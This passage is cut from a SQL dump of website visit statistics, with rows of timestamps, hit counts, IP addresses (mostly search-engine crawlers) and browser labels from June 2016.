''),(43771,1465661468,1,1,0,0,'66.249.75.199','chrome'),(43772,1465661544,1,1,0,0,'141.8.183.25','other'),(43773,1465661750,1,1,0,0,'130.193.51.19','other'),(43774,1465661957,1,0,1,0,'66.249.75.207',''),(43775,1465662862,2,0,2,0,'66.249.75.199',''),(43776,1465663092,13,13,0,0,'46.4.116.197','other'),(43777,1465663360,1,1,0,0,'157.55.39.24','other'),(43778,1465663599,1,1,0,0,'212.90.60.36','other'),(43779,1465663743,2,0,2,0,'66.249.75.207',''),(43780,1465665107,1,1,0,0,'130.193.51.19','other'),(43781,1465665356,1,0,1,0,'66.249.75.199',''),(43782,1465665868,1,1,0,0,'94.179.246.43','firefox'),(43783,1465665955,1,0,1,0,'66.249.75.191',''),(43784,1465666590,1,0,1,0,'66.249.75.199',''),(43785,1465667223,1,0,1,0,'66.249.75.247',''),(43786,1465667389,2,0,2,0,'66.249.75.191',''),(43787,1465668015,1,1,0,0,'95.215.218.182','chrome'),(43788,1465668415,1,0,1,0,'66.249.75.191',''),(43789,1465668521,3,0,3,0,'66.249.75.199',''),(43790,1465668784,1,1,0,0,'141.8.142.61','other'),(43791,1465669016,1,1,0,0,'141.8.142.58','other'),(43792,1465669299,1,0,1,0,'66.249.75.239',''),(43793,1465669691,1,0,1,0,'66.249.75.199',''),(43794,1465669863,1,0,1,0,'66.249.75.191',''),(43795,1465670377,1,0,1,0,'66.249.75.207',''),(43796,1465670479,1,1,0,0,'66.249.75.199','chrome'),(43797,1465670565,1,0,1,0,'66.249.66.180',''),(43798,1465670778,2,0,2,0,'66.249.75.191',''),(43799,1465672277,1,1,0,0,'141.8.183.25','other'),(43800,1465672318,1,0,1,0,'66.249.66.183',''),(43801,1465672725,1,0,1,0,'66.249.75.48',''),(43802,1465672871,4,0,4,0,'66.249.75.81',''),(43803,1465672912,1,0,1,0,'66.249.66.177',''),(43804,1465673230,3,0,3,0,'66.249.75.95',''),(43805,1465674048,3,0,3,0,'66.249.75.81',''),(43806,1465674290,2,0,2,0,'66.249.75.88',''),(43807,1465674447,2,0,2,0,'66.249.75.95',''),(43808,1465675639,1,0,1,0,'66.249.75.88',''),(43809,1465678195,1,0,1,0,'66.249.75.207',''),(43810,1465679083,3,0,3,0,'66.249.75.199',''),(43811,1465679306,1,1,0,0,'130.193.50.34','other'),(43812,1465679494,1,0,1,0,'66.249.75.207',''),(43813,1465680010,3,0,3,0,'66.249.75.191',''),(43814,1465680113,2,0,2,0,'66.249.75.199',''),(43815,1465680632,1,0,1,0,'66.249.66.177',''),(43816,1465681100,1,0,1,0,'66.249.75.199',''),(43817,1465681439,2,0,2,0,'66.249.75.191',''),(43818,1465682493,2,0,2,0,'66.249.75.199',''),(43819,1465682547,1,0,1,0,'66.249.75.207',''),(43820,1465682820,1,1,0,0,'130.193.51.19','other'),(43821,1465682838,1,1,0,0,'141.8.142.1','other'),(43822,1465682996,1,0,1,0,'66.249.75.247',''),(43823,1465683413,1,1,0,0,'46.200.105.98','firefox'),(43824,1465683664,1,0,1,0,'66.249.75.231',''),(43825,1465684003,1,0,1,0,'66.249.75.191',''),(43826,1465684791,1,0,1,0,'66.249.75.199',''),(43827,1465684934,1,1,0,0,'157.55.39.141','other'),(43828,1465685671,1,1,0,0,'180.76.15.143','other'),(43829,1465686117,3,0,3,0,'66.249.75.191',''),(43830,1465686528,2,0,2,0,'66.249.75.247',''),(43831,1465686862,1,1,0,0,'130.193.50.38','other'),(43832,1465686936,1,1,0,0,'178.154.189.31','other'),(43833,1465686940,2,0,2,0,'66.249.75.207',''),(43834,1465687093,1,0,1,0,'66.249.75.199',''),(43835,1465687367,1,1,0,0,'141.8.142.61','other'),(43836,1465688223,1,0,1,0,'66.249.75.207',''),(43837,1465688568,1,0,1,0,'66.249.66.183',''),(43838,1465689820,1,0,1,0,'66.249.66.180',''),(43839,1465690568,1,1,0,0,'141.8.183.25','other'),(43840,1465692273,1,0,1,0,'66.249.75.247',''),(43841,1465692896,1,0,1,0,'66.249.75.231',''),(43842,1465693800,1,0,1,0,'66.249.75.207',''),(43843,1465693933,1,0,1,0,'66.249.75.199',''),(43844,1465694094,1,0,1,0,'66.249.66.183',''),(43845,1465694272,1,1,0,0,'130.193.51.19','other'),(43846,1465695034,1,0,1,0,'66.249.75.191',''),(43847,1465695999,1,0,1,0,'66.249.75.191',''),(43848,1465696399,1,0,1,0,'66.249.75.199',''),(43849,1465696451,1,0,1,0,'66.249.75.207',''),(43850,1465697321,1,0,1,0,'66.249.75.191',''),(43851,1465697360,1,0,1,0,'66.249.75.199',''),(43852,1465697888,1,1,0,0,'66.249.75.239','chrome'),(43853,1465698878,1,1,0,0,'176.9.10.227','other'),(43854,1465699860,3,3,0,0,'5.9.73.227','other'),(43855,1465700417,1,0,1,0,'66.249.75.199',''),(43856,1465700667,2,0,2,0,'66.249.75.207',''),(43857,1465700836,1,1,0,0,'141.8.142.25','other'),(43858,1465701082,4,0,4,0,'66.249.75.191',''),(43859,1465701367,2,0,2,0,'66.249.75.199',''),(43860,1465702360,1,0,1,0,'66.249.75.199',''),(43861,1465702386,4,4,0,0,'193.111.140.153','other'),(43862,1465702469,1,1,0,0,'5.255.253.4','other'),(43863,1465703822,1,0,1,0,'66.249.75.247',''),(43864,1465703855,3,1,2,0,'66.249.75.191',''),(43865,1465704189,2,0,2,0,'66.249.75.207',''),(43866,1465704769,1,1,0,0,'93.158.152.9','other'),(43867,1465704772,1,1,0,0,'130.193.50.4','other'),(43868,1465704825,1,0,1,0,'66.249.75.199',''),(43869,1465705044,1,0,1,0,'66.249.75.191',''),(43870,1465705218,1,0,1,0,'66.249.75.207',''),(43871,1465706837,1,0,1,0,'66.249.75.191',''),(43872,1465707124,1,0,1,0,'66.249.75.199',''),(43873,1465707269,4,0,4,0,'66.249.75.207',''),(43874,1465707385,3,1,2,0,'66.249.75.199',''),(43875,1465707726,1,1,0,0,'141.8.183.19','other'),(43876,1465708180,2,0,2,0,'66.249.75.239',''),(43877,1465708215,3,0,3,0,'66.249.75.191',''),(43878,1465708336,4,4,0,0,'192.187.108.35','other'),(43879,1465709196,3,0,3,0,'66.249.75.191',''),(43880,1465709391,1,0,1,0,'66.249.75.199',''),(43881,1465709406,1,1,0,0,'91.192.132.242','firefox'),(43882,1465709434,2,2,0,0,'130.193.50.34','other'),(43883,1465709629,3,0,3,0,'66.249.75.207',''),(43884,1465709639,4,4,0,0,'130.193.51.19','other'),(43885,1465709899,1,1,0,0,'141.8.142.58','other'),(43886,1465710769,3,3,0,0,'130.193.51.19','other'),(43887,1465710897,1,1,0,0,'93.158.152.84','other'),(43888,1465711025,1,1,0,0,'141.8.142.61','other'),(43889,1465711153,2,2,0,0,'130.193.50.34','other'),(43890,1465711353,4,4,0,0,'141.8.142.58','other'),(43891,1465712117,1,0,1,0,'66.249.75.191',''),(43892,1465712755,1,0,1,0,'66.249.69.175',''),(43893,1465713401,1,1,0,0,'40.77.167.104','other'),(43894,1465713422,2,0,2,0,'66.249.75.207',''),(43895,1465713619,1,1,0,0,'91.196.178.166','other'),(43896,1465713801,1,0,1,0,'66.249.75.239',''),(43897,1465714460,1,0,1,0,'66.249.69.170',''),(43898,1465714579,1,0,1,0,'66.249.75.191',''),(43899,1465714655,1,1,0,0,'91.196.178.166','other'),(43900,1465715782,1,1,0,0,'130.193.51.19','other'),(43901,1465716083,1,0,1,0,'66.249.66.183',''),(43902,1465716861,1,1,0,0,'141.8.142.58','other'),(43903,1465717021,1,1,0,0,'141.8.183.25','other'),(43904,1465717734,1,0,1,0,'66.249.69.170',''),(43905,1465718202,1,0,1,0,'66.249.69.180',''),(43906,1465718268,1,1,0,0,'66.249.69.175','chrome'),(43907,1465719238,2,0,2,0,'66.249.69.180',''),(43908,1465719427,1,0,1,0,'66.249.69.175',''),(43909,1465720033,1,0,1,0,'66.249.69.244',''),(43910,1465720042,1,0,1,0,'66.249.66.177',''),(43911,1465720249,3,0,3,0,'66.249.69.180',''),(43912,1465720818,1,0,1,0,'66.249.69.249',''),(43913,1465721418,1,1,0,0,'93.158.152.84','other'),(43914,1465721492,1,1,0,0,'141.8.142.67','other'),(43915,1465721511,3,0,3,0,'66.249.69.175',''),(43916,1465721631,1,1,0,0,'93.158.152.9','other'),(43917,1465721835,2,0,2,0,'66.249.69.170',''),(43918,1465722492,1,0,1,0,'66.249.69.175',''),(43919,1465722606,1,1,0,0,'51.255.65.40','other'),(43920,1465722767,1,0,1,0,'66.249.69.170',''),(43921,1465722952,1,0,1,0,'66.249.69.180',''),(43922,1465723371,1,1,0,0,'37.55.184.217','chrome'),(43923,1465723827,1,0,1,0,'66.249.69.170',''),(43924,1465723942,2,0,2,0,'66.249.69.180',''),(43925,1465724352,1,0,1,0,'66.249.66.183',''),(43926,1465724656,1,0,1,0,'66.249.69.175',''),(43927,1465724924,1,0,1,0,'66.249.69.170',''),(43928,1465726187,1,0,1,0,'66.249.79.215',''),(43929,1465726693,2,0,2,0,'66.249.69.170',''),(43930,1465726852,3,0,3,0,'66.249.69.175',''),(43931,1465727122,1,1,0,0,'94.179.246.43','firefox'),(43932,1465727206,4,4,0,0,'130.193.50.34','other'),(43933,1465727504,1,1,0,0,'130.193.51.19','other'),(43934,1465727783,1,1,0,0,'37.53.123.36','chrome'),(43935,1465727898,2,0,2,0,'66.249.69.180',''),(43936,1465727922,2,0,2,0,'66.249.69.170',''),(43937,1465727976,1,1,0,0,'151.80.31.104','other'),(43938,1465728434,1,1,0,0,'130.193.50.34','other'),(43939,1465728657,1,1,0,0,'141.8.183.25','other'),(43940,1465730752,1,0,1,0,'66.249.69.175',''),(43941,1465730912,1,0,1,0,'66.249.69.170',''),(43942,1465731076,1,0,1,0,'66.249.69.180',''),(43943,1465731388,1,1,0,0,'94.231.188.10','firefox'),(43944,1465733254,1,0,1,0,'66.249.75.199',''),(43945,1465733274,1,0,1,0,'66.249.69.175',''),(43946,1465733453,1,0,1,0,'66.249.69.180',''),(43947,1465733910,1,0,1,0,'66.249.69.244',''),(43948,1465733918,1,1,0,0,'66.249.69.175','chrome'),(43949,1465734003,1,1,0,0,'66.249.69.170','chrome'),(43950,1465734493,1,1,0,0,'91.196.178.33','other'),(43951,1465735034,2,0,2,0,'66.249.69.175',''),(43952,1465736180,1,0,1,0,'66.249.75.247',''),(43953,1465736362,1,1,0,0,'66.249.75.239','chrome'),(43954,1465736700,2,0,2,0,'66.249.64.170',''),(43955,1465736881,4,4,0,0,'5.9.111.70','other'),(43956,1465736974,1,0,1,0,'66.249.64.175',''),(43957,1465737043,1,0,1,0,'66.249.64.180',''),(43958,1465737999,1,0,1,0,'66.249.64.239',''),(43959,1465738252,2,0,2,0,'66.249.64.175',''),(43960,1465738294,3,0,3,0,'66.249.64.170',''),(43961,1465738773,3,2,1,0,'66.249.64.170',''),(43962,1465739801,2,0,2,0,'66.249.64.249',''),(43963,1465740305,1,0,1,0,'66.249.75.191',''),(43964,1465740306,3,0,3,0,'66.249.64.170',''),(43965,1465741340,5,0,5,0,'66.249.64.170',''),(43966,1465742015,1,0,1,0,'66.249.64.239',''),(43967,1465742313,3,0,3,0,'66.249.64.170',''),(43968,1465743054,1,0,1,0,'66.249.64.249',''),(43969,1465743339,1,1,0,0,'141.8.183.25','other'),(43970,1465744200,1,0,1,0,'66.249.64.175',''),(43971,1465744305,2,0,2,0,'66.249.64.180',''),(43972,1465744569,1,1,0,0,'64.246.187.42','firefox'),(43973,1465745089,1,0,1,0,'66.249.64.244',''),(43974,1465745090,1,0,1,0,'66.249.64.249',''),(43975,1465745422,1,1,0,0,'66.102.9.93','chrome'),(43976,1465745445,1,1,0,0,'91.196.178.35','firefox'),(43977,1465745478,1,0,1,0,'66.249.64.170',''),(43978,1465745494,2,0,2,0,'66.249.64.175',''),(43979,1465748670,4,0,4,0,'66.249.64.175',''),(43980,1465749372,1,0,1,0,'66.249.64.170',''),(43981,1465749426,1,0,1,0,'66.249.64.180',''),(43982,1465750410,1,0,1,0,'66.249.75.239',''),(43983,1465750518,1,1,0,0,'40.77.167.57','other'),(43984,1465751165,2,0,2,0,'66.249.64.180',''),(43985,1465751660,4,0,4,0,'66.249.64.170',''),(43986,1465751750,2,0,2,0,'66.249.64.175',''),(43987,1465752254,1,0,1,0,'66.249.64.239',''),(43988,1465752436,1,1,0,0,'180.76.15.147','other'),(43989,1465752508,1,0,1,0,'66.249.64.180',''),(43990,1465752941,1,0,1,0,'66.249.64.175',''),(43991,1465753086,1,1,0,0,'91.196.178.167','firefox'),(43992,1465753106,1,0,1,0,'66.249.64.170',''),(43993,1465753267,2,2,0,0,'130.193.50.34','other'),(43994,1465753645,1,1,0,0,'141.8.142.58','other'),(43995,1465754855,1,1,0,0,'93.158.152.84','other'),(43996,1465755107,1,0,1,0,'66.249.64.170',''),(43997,1465755518,2,0,2,0,'66.249.64.175',''),(43998,1465756642,1,0,1,0,'66.249.64.175',''),(43999,1465756760,1,0,1,0,'66.249.75.191',''),(44000,1465757367,1,0,1,0,'66.249.64.170',''),(44001,1465760557,1,0,1,0,'66.249.75.207',''),(44002,1465760702,2,0,2,0,'66.249.64.175',''),(44003,1465760935,3,0,3,0,'66.249.64.180',''),(44004,1465761745,2,0,2,0,'66.249.64.175',''),(44005,1465761988,3,0,3,0,'66.249.64.170',''),(44006,1465763807,4,0,4,0,'66.249.64.175',''),(44007,1465764076,2,0,2,0,'66.249.64.180',''),(44008,1465764136,4,0,4,0,'66.249.64.170',''),(44009,1465764297,1,1,0,0,'40.77.167.57','other'),(44010,1465764734,4,0,4,0,'66.249.64.175',''),(44011,1465766358,3,0,3,0,'66.249.64.170',''),(44012,1465766726,2,0,2,0,'66.249.64.175',''),(44013,1465767389,1,0,1,0,'66.249.64.170',''),(44014,1465767582,1,0,1,0,'66.249.64.180',''),(44015,1465767849,2,0,2,0,'66.249.64.175',''),(44016,1465767939,1,1,0,0,'141.8.183.25','other'),(44017,1465768881,1,0,1,0,'66.249.64.170',''),(44018,1465769028,1,0,1,0,'66.249.64.244',''),(44019,1465769235,1,1,0,0,'180.76.15.34','other'),(44020,1465769744,1,0,1,0,'66.249.75.191',''),(44021,1465769835,1,0,1,0,'66.249.64.180',''),(44022,1465770694,1,0,1,0,'66.249.64.175',''),(44023,1465770970,1,0,1,0,'66.249.64.180',''),(44024,1465771449,1,0,1,0,'66.249.75.191',''),(44025,1465771608,1,0,1,0,'66.249.64.175',''),(44026,1465777776,1,1,0,0,'141.8.142.58','other'),(44027,1465777962,1,1,0,0,'40.77.167.104','other'),(44028,1465778045,1,1,0,0,'130.193.50.34','other'),(44029,1465779680,1,1,0,0,'130.193.50.34','other'),(44030,1465780107,1,1,0,0,'66.249.64.175','chrome'),(44031,1465780818,1,1,0,0,'178.203.146.227','other'),(44032,1465782767,1,0,1,0,'66.249.64.118',''),(44033,1465784045,2,2,0,0,'130.193.50.34','other'),(44034,1465784170,1,1,0,0,'130.193.51.19','other'),(44035,1465784290,1,1,0,0,'141.8.142.58','other'),(44036,1465787214,1,0,1,0,'66.249.64.118',''),(44037,1465787375,1,0,1,0,'66.249.64.108',''),(44038,1465788269,2,2,0,0,'130.193.50.34','other'),(44039,1465789473,1,0,1,0,'66.249.64.244',''),(44040,1465789497,1,0,1,0,'66.249.64.170',''),(44041,1465789703,3,0,3,0,'66.249.64.180',''),(44042,1465790737,1,1,0,0,'151.80.31.184','other'),(44043,1465791705,1,0,1,0,'66.249.64.180',''),(44044,1465792014,1,1,0,0,'176.120.47.213','other'),(44045,1465792086,4,4,0,0,'130.193.50.34','other'),(44046,1465793248,1,0,1,0,'66.249.64.175',''),(44047,1465793540,2,2,0,0,'130.193.50.34','other'),(44048,1465795518,1,0,1,0,'66.249.64.175',''),(44049,1465796215,1,0,1,0,'66.249.64.170',''),(44050,1465796461,1,0,1,0,'66.249.64.175',''),(44051,1465797739,1,1,0,0,'82.207.26.224','chrome'),(44052,1465797804,2,0,2,0,'66.249.64.175',''),(44053,1465798706,1,1,0,0,'91.196.178.70','firefox'),(44054,1465798969,1,1,0,0,'66.249.93.150','chrome'),(44055,1465799052,1,1,0,0,'130.193.51.19','other'),(44056,1465799342,1,1,0,0,'91.196.178.66','firefox'),(44057,1465801189,1,1,0,0,'46.133.64.111','chrome'),(44058,1465801227,1,0,1,0,'66.249.64.170',''),(44059,1465802050,1,1,0,0,'94.178.219.197','firefox'),(44060,1465803064,1,0,1,0,'66.249.64.175',''),(44061,1465803792,1,0,1,0,'66.249.64.170',''),(44062,1465804003,1,0,1,0,'66.249.64.180',''),(44063,1465804243,1,1,0,0,'149.202.98.160','chrome'),(44064,1465804464,1,1,0,0,'91.196.178.66','firefox'),(44065,1465805126,1,1,0,0,'94.179.68.65','chrome'),(44066,1465805612,1,1,0,0,'91.196.178.66','firefox'),(44067,1465806211,1,1,0,0,'91.196.178.70','chrome'),(44068,1465806866,1,1,0,0,'91.196.177.20','chrome'),(44069,1465807352,1,1,0,0,'94.179.124.149','firefox'),(44070,1465807608,1,1,0,0,'130.193.50.34','other'),(44071,1465807936,1,1,0,0,'130.193.51.19','other'),(44072,1465808248,13,13,0,0,'136.243.5.87','other'),(44073,1465809589,1,1,0,0,'164.132.161.21','other'),(44074,1465810599,1,1,0,0,'130.193.50.34','other'),(44075,1465813219,1,1,0,0,'178.93.22.211','chrome'),(44076,1465813418,1,0,1,0,'66.249.64.239',''),(44077,1465813571,1,0,1,0,'66.249.64.170',''),(44078,1465813708,1,0,1,0,'66.249.64.180',''),(44079,1465813776,2,2,0,0,'94.179.25.77','chrome'),(44080,1465813846,1,1,0,0,'91.196.178.70','firefox'),(44081,1465817037,1,1,0,0,'94.179.111.84','firefox'),(44082,1465818489,1,1,0,0,'185.26.182.35','chrome'),(44083,1465818769,1,1,0,0,'91.196.178.66','chrome'),(44084,1465820462,1,1,0,0,'91.196.178.66','firefox'),(44085,1465820485,1,1,0,0,'51.255.65.82','other'),(44086,1465820508,1,0,1,0,'66.249.64.249',''),(44087,1465820569,2,0,2,0,'66.249.64.175',''),(44088,1465820720,1,1,0,0,'130.193.50.34','other'),(44089,1465820930,1,1,0,0,'141.8.183.25','other'),(44090,1465821343,1,1,0,0,'37.52.104.73','chrome'),(44091,1465821795,4,4,0,0,'62.210.107.201','other'),(44092,1465821911,1,1,0,0,'37.52.133.16','chrome'),(44093,1465822253,1,1,0,0,'94.231.187.10','firefox'),(44094,1465822684,1,1,0,0,'91.196.178.66','firefox'),(44095,1465822977,1,1,0,0,'94.179.89.94','chrome'),(44096,1465823262,1,1,0,0,'91.196.178.136','firefox'),(44097,1465824127,1,1,0,0,'37.52.133.16','chrome'),(44098,1465825809,1,1,0,0,'178.94.215.211','chrome'),(44099,1465826607,1,0,1,0,'66.249.64.249',''),(44100,1465827218,1,0,1,0,'66.249.64.244',''),(44101,1465828055,1,0,1,0,'66.249.64.175',''),(44102,1465828075,1,1,0,0,'141.8.183.25','other'),(44103,1465828306,1,1,0,0,'109.86.9.194','chrome'),(44104,1465828314,1,0,1,0,'66.249.64.170',''),(44105,1465829552,1,1,0,0,'95.220.118.21','chrome'),(44106,1465829553,1,1,0,0,'95.26.146.83','chrome'),(44107,1465830543,1,1,0,0,'176.77.102.116','msie'),(44108,1465830544,1,1,0,0,'178.140.232.252','msie'),(44109,1465830568,1,1,0,0,'37.115.106.47','chrome'),(44110,1465830595,1,1,0,0,'141.8.183.25','other'),(44111,1465831032,1,1,0,0,'94.179.68.65','chrome'),(44112,1465832457,1,1,0,0,'130.193.50.34','other'),(44113,1465832522,1,1,0,0,'130.193.51.19','other'),(44114,1465835230,1,1,0,0,'78.111.189.247','chrome'),(44115,1465837129,1,1,0,0,'91.124.153.53','chrome'),(44116,1465838136,1,1,0,0,'91.196.178.67','firefox'),(44117,1465838684,15,15,0,0,'142.4.216.172','chrome'),(44118,1465838685,20,20,0,0,'142.4.216.172','firefox'),(44119,1465838687,15,15,0,0,'142.4.216.172','msie'),(44120,1465839030,1,1,0,0,'78.152.161.218','firefox'),(44121,1465839223,1,0,1,0,'66.249.64.244',''),(44122,1465840053,1,0,1,0,'66.249.64.170',''),(44123,1465840346,1,1,0,0,'130.193.51.19','other'),(44124,1465840428,1,0,1,0,'66.249.64.175',''),(44125,1465841696,1,0,1,0,'66.249.64.175',''),(44126,1465842159,2,0,2,0,'66.249.64.108',''),(44127,1465842438,1,1,0,0,'180.76.15.32','other'),(44128,1465843235,1,1,0,0,'193.194.127.217','firefox'),(44129,1465843806,2,0,2,0,'66.249.64.180',''),(44130,1465844201,1,0,1,0,'66.249.64.175',''),(44131,1465844706,1,0,1,0,'66.249.64.37',''),(44132,1465845393,1,1,0,0,'141.0.13.176','chrome'),(44133,1465847889,1,1,0,0,'193.93.217.54','firefox'),(44134,1465849287,1,1,0,0,'164.132.161.61','other'),(44135,1465850355,1,1,0,0,'130.193.50.34','other'),(44136,1465850432,2,2,0,0,'157.55.39.222','other'),(44137,1465850486,1,1,0,0,'130.193.51.19','other'),(44138,1465850652,1,0,1,0,'66.249.64.180',''),(44139,1465851275,1,1,0,0,'91.124.119.104','chrome'),(44140,1465851703,1,1,0,0,'130.193.50.34','other'),(44141,1465852598,1,1,0,0,'91.196.178.136','chrome'),(44142,1465853084,1,0,1,0,'66.249.64.239',''),(44143,1465853269,1,0,1,0,'66.249.64.108',''),(44144,1465853751,2,0,2,0,'66.249.64.170',''),(44145,1465854537,1,0,1,0,'66.249.64.175',''),(44146,1465854586,1,1,0,0,'91.124.238.142','chrome'),(44147,1465854588,1,0,1,0,'66.249.64.113',''),(44148,1465854725,1,0,1,0,'66.249.64.180',''),(44149,1465854988,1,1,0,0,'66.249.64.180','chrome'),(44150,1465855219,1,0,1,0,'66.249.75.207',''),(44151,1465855913,1,1,0,0,'93.158.152.84','other'),(44152,1465856845,1,1,0,0,'141.8.183.25','other'),(44153,1465857108,2,0,2,0,'66.249.64.175',''),(44154,1465857473,1,0,1,0,'66.249.64.118',''),(44155,1465857922,1,0,1,0,'66.249.64.239',''),(44156,1465857934,1,0,1,0,'66.249.64.108',''),(44157,1465858287,2,0,2,0,'66.249.64.175',''),(44158,1465858291,1,0,1,0,'66.249.64.170',''),(44159,1465858337,1,0,1,0,'66.249.64.244',''),(44160,1465859645,2,1,1,0,'66.249.64.170',''),(44161,1465860441,1,1,0,0,'141.8.142.58','other'),(44162,1465860628,2,0,2,0,'66.249.64.175',''),(44163,1465863111,1,0,1,0,'66.249.64.180',''),(44164,1465863237,1,0,1,0,'66.249.64.118',''),(44165,1465863275,1,1,0,0,'141.8.142.58','other'),(44166,1465864316,2,0,2,0,'66.249.64.175',''),(44167,1465865070,4,4,0,0,'69.30.213.82','other'),(44168,1465865222,1,0,1,0,'66.249.64.175',''),(44169,1465866183,1,1,0,0,'5.255.253.4','other'),(44170,1465866416,3,0,3,0,'66.249.64.108',''),(44171,1465867271,4,0,4,0,'66.249.64.175',''),(44172,1465867601,1,1,0,0,'157.55.39.222','other'),(44173,1465868020,1,0,1,0,'66.249.64.118',''),(44174,1465868617,1,0,1,0,'66.249.75.191',''),(44175,1465868885,1,0,1,0,'66.249.64.170',''),(44176,1465870536,1,0,1,0,'66.249.64.108',''),(44177,1465870658,1,0,1,0,'66.249.64.118',''),(44178,1465871273,1,1,0,0,'51.255.65.8','other'),(44179,1465872343,1,0,1,0,'66.249.64.113',''),(44180,1465872399,1,0,1,0,'66.249.64.170',''),(44181,1465874283,1,0,1,0,'66.249.64.244',''),(44182,1465878131,1,1,0,0,'141.8.142.58','other'),(44183,1465880520,5,0,5,0,'66.249.64.175',''),(44184,1465880615,1,0,1,0,'66.249.75.191',''),(44185,1465880825,1,0,1,0,'66.249.64.180',''),(44186,1465880862,1,0,1,0,'66.249.64.249',''),(44187,1465880888,9,0,9,0,'66.249.64.170',''),(44188,1465881562,2,0,2,0,'66.249.64.175',''),(44189,1465881801,11,0,11,0,'66.249.64.170',''),(44190,1465882071,1,0,1,0,'66.249.64.239',''),(44191,1465882093,4,0,4,0,'66.249.64.180',''),(44192,1465882299,1,0,1,0,'66.249.64.249',''),(44193,1465882946,1,1,0,0,'94.179.69.81','firefox'),(44194,1465883127,1,1,0,0,'46.133.86.122','chrome'),(44195,1465883517,1,1,0,0,'94.179.85.36','firefox'),(44196,1465883848,1,1,0,0,'94.179.69.81','firefox'),(44197,1465884071,1,1,0,0,'94.179.105.233','chrome'),(44198,1465884330,1,1,0,0,'91.234.3.20','opera'),(44199,1465884454,1,0,1,0,'66.249.64.170',''),(44200,1465884491,1,0,1,0,'66.249.64.180',''),(44201,1465884494,1,1,0,0,'66.249.93.150','chrome'),(44202,1465884564,1,1,0,0,'91.196.178.129','firefox'),(44203,1465884857,1,1,0,0,'94.179.69.81','firefox'),(44204,1465884979,1,0,1,0,'66.249.64.249',''),(44205,1465885183,1,1,0,0,'91.196.178.68','chrome'),(44206,1465885355,2,0,2,0,'66.249.64.175',''),(44207,1465885986,1,1,0,0,'91.196.178.133','chrome'),(44208,1465886556,2,2,0,0,'94.179.77.165','firefox'),(44209,1465886794,1,1,0,0,'91.196.178.68','chrome'),(44210,1465887402,2,0,2,0,'66.249.64.180',''),(44211,1465888275,1,1,0,0,'94.179.118.142','chrome'),(44212,1465888916,1,1,0,0,'93.73.234.193','firefox'),(44213,1465889191,2,2,0,0,'91.196.178.66','firefox'),(44214,1465889280,1,1,0,0,'130.193.50.34','other'),(44215,1465890718,1,0,1,0,'66.249.64.244',''),(44216,1465890799,1,0,1,0,'66.249.64.249',''),(44217,1465891060,1,1,0,0,'46.173.163.106','chrome'),(44218,1465891379,2,2,0,0,'91.196.178.66','firefox'),(44219,1465892255,1,1,0,0,'212.26.134.106','chrome'),(44220,1465892265,1,1,0,0,'46.200.108.36','chrome'),(44221,1465893328,2,0,2,0,'66.249.64.239',''),(44222,1465893448,1,1,0,0,'78.25.17.95','chrome'),(44223,1465894903,1,1,0,0,'194.242.103.188','chrome'),(44224,1465895485,1,1,0,0,'91.196.178.66','firefox'),(44225,1465895974,1,1,0,0,'141.8.183.25','other'),(44226,1465896896,1,0,1,0,'66.249.64.249',''),(44227,1465899228,1,1,0,0,'77.122.220.69','chrome'),(44228,1465899804,1,1,0,0,'157.55.39.113','other'),(44229,1465900015,5,5,0,0,'193.254.238.25','chrome'),(44230,1465901014,1,1,0,0,'94.179.32.185','firefox'),(44231,1465903103,2,2,0,0,'37.52.20.113','msie'),(44232,1465903603,1,1,0,0,'91.196.178.66','firefox'),(44233,1465904944,10,0,10,0,'66.249.64.170',''),(44234,1465904985,1,0,1,0,'66.249.64.249',''),(44235,1465905052,1,0,1,0,'66.249.64.180',''),(44236,1465905452,4,0,4,0,'66.249.64.175',''),(44237,1465905887,4,0,4,0,'66.249.64.170',''),(44238,1465906008,3,0,3,0,'66.249.64.180',''),(44239,1465906027,1,1,0,0,'91.196.178.66','chrome'),(44240,1465906500,5,0,5,0,'66.249.64.175',''),(44241,1465906797,6,0,6,0,'66.249.64.170',''),(44242,1465906859,1,1,0,0,'141.8.183.25','other'),(44243,1465906986,1,1,0,0,'91.196.178.66','chrome'),(44244,1465907020,1,1,0,0,'130.193.50.34','other'),(44245,1465907375,1,1,0,0,'94.45.138.118','chrome'),(44246,1465907694,1,1,0,0,'91.196.178.68','chrome'),(44247,1465908471,1,1,0,0,'91.196.178.68','firefox'),(44248,1465908919,1,1,0,0,'46.173.163.106','chrome'),(44249,1465910972,1,1,0,0,'91.196.178.66','firefox'),(44250,1465913033,1,1,0,0,'51.255.65.88','other'),(44251,1465913375,2,2,0,0,'178.95.158.137','chrome'),(44252,1465915099,1,1,0,0,'141.8.142.58','other'),(44253,1465915953,1,1,0,0,'91.196.178.35','firefox'),(44254,1465916017,1,1,0,0,'37.55.231.57','chrome'),(44255,1465917615,1,1,0,0,'173.234.153.122','other'),(44256,1465917720,1,0,1,0,'66.249.64.239',''),(44257,1465917764,1,0,1,0,'66.249.64.244',''),(44258,1465918175,1,0,1,0,'66.249.75.191',''),(44259,1465918203,1,0,1,0,'66.249.64.180',''),(44260,1465918694,1,1,0,0,'93.178.216.235','chrome'),(44261,1465919319,1,1,0,0,'93.75.7.160','chrome'),(44262,1465919632,1,1,0,0,'91.196.178.68','firefox'),(44263,1465921239,4,4,0,0,'69.30.213.202','other'),(44264,1465921590,1,1,0,0,'66.249.64.249','chrome'),(44265,1465922470,1,1,0,0,'157.55.39.113','other'),(44266,1465922910,2,2,0,0,'130.193.51.19','other'),(44267,1465923474,1,1,0,0,'130.193.50.34','other'),(44268,1465924373,1,0,1,0,'66.249.64.244',''),(44269,1465925065,1,1,0,0,'141.8.142.61','other'),(44270,1465925106,1,1,0,0,'95.158.42.244','chrome'),(44271,1465925419,1,1,0,0,'93.158.152.84','other'),(44272,1465925480,1,1,0,0,'130.193.51.19','other'),(44273,1465925545,1,1,0,0,'141.8.142.58','other'),(44274,1465929877,1,0,1,0,'66.249.75.191',''),(44275,1465930317,1,1,0,0,'193.194.127.217','firefox'),(44276,1465931908,1,0,1,0,'66.249.75.231',''),(44277,1465932602,4,4,0,0,'5.9.142.226','other'),(44278,1465932760,1,1,0,0,'91.196.178.35','chrome'),(44279,1465933036,1,1,0,0,'95.135.43.128','chrome'),(44280,1465934971,1,0,1,0,'66.249.75.199',''),(44281,1465935004,1,0,1,0,'66.249.75.207',''),(44282,1465935023,1,1,0,0,'93.76.170.212','opera'),(44283,1465936441,1,1,0,0,'130.193.50.34','other'),(44284,1465938560,1,1,0,0,'51.255.65.92','other'),(44285,1465941237,1,0,1,0,'66.249.69.180',''),(44286,1465943066,1,1,0,0,'130.193.50.34','other'),(44287,1465943447,1,1,0,0,'40.77.167.57','other'),(44288,1465944904,1,0,1,0,'66.249.69.170',''),(44289,1465944957,1,0,1,0,'66.249.75.239',